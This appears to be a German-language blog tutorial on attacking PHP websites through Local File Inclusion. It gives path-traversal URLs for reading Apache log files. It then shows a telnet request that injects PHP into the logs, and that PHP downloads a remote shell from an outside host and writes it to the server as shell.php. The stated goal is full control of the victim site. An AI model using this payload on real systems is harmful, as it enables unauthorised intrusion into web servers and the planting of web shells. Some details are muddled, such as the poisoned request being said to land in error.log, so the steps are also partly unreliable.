So meine Damen und Herren,

heute zeige ich euch mal eine LocalFileInclusion (kurz: LFI)

Ich gehe wieder Schritt für Schritt durch, damit ihr es mitverfolgen könnt.

Bei dieser Art von Inclusion ist es relevant, dass gewisse Berechtigungen mitspielen.Welche das sind, werde ich euch später noch nennen.

    Aber ich fange an:

    Seid ihr zum Beispiel auf einer Seite, auf der es heisst:

  www.meineseite.com/index.php?content=downloads.php

    Kennt ihr schon von der Remote File Inclusion ;)

    Diesmal werden Dateien/Seiten ausserhalb des lokalen Bereiches nicht geladen!

    Was können wir also tun?

    Wir finden erstmal raus, auf was für einem Server die Website liegt.Wie das funktioniert?Dafür gibt es viele Addons im FireFox, die dies anzeigen oder über WhoIs-Abfrage etc.

    Ich habe also nun eine Seite vor mir, die meinetwegen „Apache“ benutzt, kein Apache 2 – Apache !

    Nun testen wir einmal oben den Link so zu ändern, dass er so aussieht:

   www.meineseite.com/index.php?content=../apache/logs/error.log

    Die Zeichenfolge ../ steht immer dafür, dass wir ein Verzeichnis zurückspringen.

    Wenn du Glück hast, zeigt er nun die error.log an.Falls nicht kannst du noch folgende Pfade testen:
    ../../apache/logs/error.log

    ../../../apache/logs/error.log

    Auch die access.log kann begutachtet werden:

    ../apache/logs/access.log

    ../../apache/logs/access.log

    ../../../apache/logs/access.log

    Die Seitenaufrufe werden in der access.log gespeichert.Ein Zugriff hat in etwa dieses Schema:

    xxx.xxx.xx.xx - - [13/Aug/2009:13:37:00 +0200] "GET /index.php?content=links.php HTTP/1.1" 200 467

    Hierbei wurde auf die links.php zugegriffen.

    Nun können wir per TelNet einen Eintrag in die access.log schreiben.

    Dazu starten wir die Eingabeaufforderung:

    Start -> Ausführen -> cmd
    
    Nun starten wir TelNet mit dem Befehl:

    telnet 62.12.152.124 80

    Ihr müsst eure IP natürlich anpassen.

    Nun fügt ihr folgenden Code in die cmd ein.

    GET/<?php $datei = fopen(“shell.php“,“w+“);$stream = fopen(“http://servermitshell.de/shell.txt“, „r“);while (!feof($stream)) { $shell .= fgets($stream); } fclose($stream);fwrite($datei,$shell) ;fclose($stream);fclose($datei); ?>

    Damit wird eine Datei mit dem Namen shell.php erstellt.

    Der Inhalt kommt aus der http://servermitshell.de/shell.txt
    Nun wurde euer Request in die error.log geschrieben

    Nun die error.log öffnen und den PHP Code zur Ausführung bringen.

    Nun wurde auf dem Server eine shell.php erstellt mit dem Shellinhalt, nun habt ihr vollenzugriff auf die Seite. 


Kopieren mit Quell- und Autorenangabe erlaubt
Ändern verboten!

Blitzkrieg-Blitzblog.tk